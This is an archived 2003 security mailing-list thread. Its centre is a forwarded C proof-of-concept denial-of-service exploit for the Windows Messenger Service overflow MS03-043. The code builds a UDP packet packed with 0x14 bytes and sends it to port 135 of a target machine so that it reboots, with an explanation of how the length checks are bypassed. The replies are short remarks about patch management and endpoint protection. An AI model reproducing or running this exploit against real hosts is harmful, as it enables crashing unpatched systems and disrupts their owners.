RE: Attack the MS043 vulnerability

From: Scott Morris (swm@emanon.com)
Date: Wed Oct 22 2003 - 09:04:55 GMT-3

That is a much more sane solution, but often one overlooked in security
deployments.....

 
Scott Morris, CCIE4 (R&S/ISP-Dial/Security/Service Provider) #4713,
CISSP, JNCIS, et al.
IPExpert CCIE Program Manager
IPExpert Sr. Technical Instructor
swm@emanon.com/smorris@ipexpert.net
http://www.ipexpert.net

-----Original Message-----
From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf Of
Peter
Sent: Tuesday, October 21, 2003 11:02 PM
To: security@groupstudy.com
Cc: ccielab@groupstudy.com
Subject: Re: Attack the MS043 vulnerability

Rather think of Cisco Security Agent for all the desktops and servers.

_____________________________
Peter
#7247 (R&S, Security, SP)
CyscoExpert Corp.
4433 W. Touhy Ave. Suite 410
Lincolnwood, IL 60712
Phone (847) 674-3392
Toll Free (866) CyscoXP (297-2697)
Fax (847) 674-2625

----- Original Message -----
From: "Wright, Jeremy" <wright@admworld.com>
To: "'Brian McGahan '" <bmcgahan@internetworkexpert.com>; "Wright,
Jeremy" <wright@admworld.com>; <security@groupstudy.com>
Cc: <ccielab@groupstudy.com>
Sent: Tuesday, October 21, 2003 9:52 PM
Subject: RE: Attack the MS043 vulnerability

> Yes, and to let upper management understand the importance of patch
management instead of having interns running around like crazy every
other week :)
>
> -----Original Message-----
> From: Brian McGahan
> To: 'Wright, Jeremy'; security@groupstudy.com
> Cc: ccielab@groupstudy.com
> Sent: 10/21/2003 8:23 PM
> Subject: RE: Attack the MS043 vulnerability
>
> Jeremy,
>
> The code sample I'm assuming is for educational and research purposes
> only, right? :)
>
> Brian McGahan, CCIE #8593
> bmcgahan@internetworkexpert.com
>
> Internetwork Expert, Inc.
> http://www.InternetworkExpert.com
> Toll Free: 877-224-8987
> Direct: 708-362-1418 (Outside the US and Canada)
>
>
> > -----Original Message-----
> > From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf
> Of
> > Wright, Jeremy
> > Sent: Tuesday, October 21, 2003 8:13 PM
> > To: 'security@groupstudy.com'
> > Cc: 'ccielab@groupstudy.com'
> > Subject: OT:Attack the MS043 vulnerability
> >
> > DoS Proof of Concept for MS03-043 - exploitation shouldn't be too
> hard.
> > Launching it one or two times against the target should make the
> machine
> > reboot. Tested against a Win2K SP4.
> >
> > "The vulnerability results because the Messenger Service does not
> properly
> > validate the length of a message before passing it to the allocated
> > buffer" according to MS bulletin. Digging into it a bit more, we
> > find that
> when a
> > character 0x14 in encountered in the 'body' part of the message, it
> > is replaced by a CR+LF. The buffer allocated for this operation is
> > twice the size
> of
> > the
> > string, which is the way to go, but is then copied to a buffer which
> was
> > only
> > allocated 11CAh bytes. Thanks to that, we can bypass the length
> > checks
> and
> > overflow the fixed size buffer.
> >
> > Credits go to LSD :)
> >
> > */
> >
> > #include <stdio.h>
> > #include <winsock.h>
> > #include <string.h>
> > #include <time.h>
> >
> > // Packet format found thanks to a bit a sniffing
> > static unsigned char packet_header[] =
> > "\x04\x00\x28\x00"
> > "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
> > "\x4f\xb6\xe6\xfc"
> > "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
> > "\xff\xff\xff\xff" "\xff\xff\xff\xff"
> > "\xff\xff\xff\xff"
> > "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\xff\xff\xff\xff"
> > "\xff\xff\xff\xff" // @74 : fields length
> > "\x00\x00";
> >
> > unsigned char field_header[] =
> > "\xff\xff\xff\xff" // @0 : field length
> > "\x00\x00\x00\x00"
> > "\xff\xff\xff\xff"; // @8 : field length
> >
> > int main(int argc,char *argv[])
> > {
> > int i, packet_size, fields_size, s;
> > unsigned char packet[8192];
> > struct sockaddr_in addr;
> > // A few conditions :
> > // 0 <= strlen(from) + strlen(machine) <= 56
> > // max fields size 3992
> > char from[] = "RECCA";
> > char machine[] = "ZEUS";
> > char body[4096] = "*** MESSAGE ***";
> >
> > WSADATA wsaData;
> >
> > WSAStartup(0x0202, &wsaData);
> >
> > ZeroMemory(&addr, sizeof(addr));
> > addr.sin_family = AF_INET;
> > addr.sin_addr.s_addr = inet_addr("192.168.186.3");
> > addr.sin_port = htons(135);
> >
> > ZeroMemory(packet, sizeof(packet));
> > packet_size = 0;
> >
> > memcpy(&packet[packet_size], packet_header,
> sizeof(packet_header)
> > - 1);
> > packet_size += sizeof(packet_header) - 1;
> >
> > i = strlen(from) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], from);
> > packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a
> multiple
> > of 4
> >
> > i = strlen(machine) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], machine);
> > packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a
> multiple
> > of 4
> >
> > fprintf(stdout, "Max 'body' size (incl. terminal NULL char)
> > = %d\n", 3992 - packet_size + sizeof(packet_header) -
> sizeof(field_header));
> >
> > memset(body, 0x14, sizeof(body));
> > body[3992 - packet_size + sizeof(packet_header) -
> > sizeof(field_header) - 1] = '\0';
> >
> > i = strlen(body) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], body);
> > packet_size += i;
> >
> > fields_size = packet_size - (sizeof(packet_header) - 1);
> > *(unsigned int *)(&packet[40]) = time(NULL);
> > *(unsigned int *)(&packet[74]) = fields_size;
> >
> > fprintf(stdout, "Total length of strings = %d\nPacket size =

> > %d\nFields size = %d\n", strlen(from) + strlen(machine) +
> strlen(body),
> > packet_size, fields_size);
> >
> > /*
> > for (i = 0; i < packet_size; i++)
> > {
> > if (i && ((i & 1) == 0))
> > fprintf(stdout, " ");
> > if (i && ((i & 15) == 0))
> > fprintf(stdout, "\n");
> > fprintf(stdout, "%02x", packet[i]);
> > }
> > fprintf(stdout, "\n");
> > */
> > if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
> > exit(EXIT_FAILURE);
> >
> > if (sendto(s, packet, packet_size, 0, (struct sockaddr
> *)&addr,
> > sizeof(addr)) == -1)
> > exit(EXIT_FAILURE);
> > /*
> > if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL)
> > ==
> -1)
> > exit(EXIT_FAILURE);
> > */
> >
> > exit(EXIT_SUCCESS);
> > }
> >
> >
> > CONFIDENTIALITY NOTICE:
> > This message is intended for the use of the individual or entity
> to
> > which it is addressed and may contain information that is
> > privileged, confidential and exempt from disclosure under applicable

> > law. If the reader of this message is not the intended recipient or

> > the employee
> or
> > agent responsible for delivering this message to the intended
> recipient,
> > you are hereby notified that any dissemination, distribution or
> copying of
> > this communication is strictly prohibited.
> > If you have received this communication in error, please notify
> us
> > immediately by email reply or by telephone and immediately delete
> > this message and any attachments. In the U.S. call us toll free at
> > (800)
> 637-
> > 5843.
> > Spanish, French, Quebecois French, Portuguese, Polish, German,
> > Dutch, Turkish, Russian, Japanese and Chinese:
> > http://www.admworld.com/confidentiality.htm.
> >
> >
> ______________________________________________________________________
> _
> > Please help support GroupStudy by purchasing your study materials
> from:
> > http://shop.groupstudy.com
> >
> > Subscription information may be found at:
> > http://www.groupstudy.com/list/CCIELab.html
>
>
> CONFIDENTIALITY NOTICE:
> This message is intended for the use of the individual or entity to
> which
it is addressed and may contain information that is privileged,
confidential and exempt from disclosure under applicable law. If the
reader of this message is not the intended recipient or the employee or
agent responsible for delivering this message to the intended recipient,
you are hereby notified that any dissemination, distribution or copying
of this communication is strictly prohibited.
> If you have received this communication in error, please notify us
immediately by email reply or by telephone and immediately delete this
message and any attachments. In the U.S. call us toll free at (800)
637-5843.
> Spanish, French, Quebecois French, Portuguese, Polish, German, Dutch,
Turkish, Russian, Japanese and Chinese:
http://www.admworld.com/confidentiality.htm.
>
> ______________________________________________________________________
> _
> Please help support GroupStudy by purchasing your study materials
from:
> http://shop.groupstudy.com
>
> Subscription information may be found at:
> http://www.groupstudy.com/list/CCIELab.html

This archive was generated by hypermail 2.1.4 : Mon Nov 24 2003 - 07:53:06 GMT-3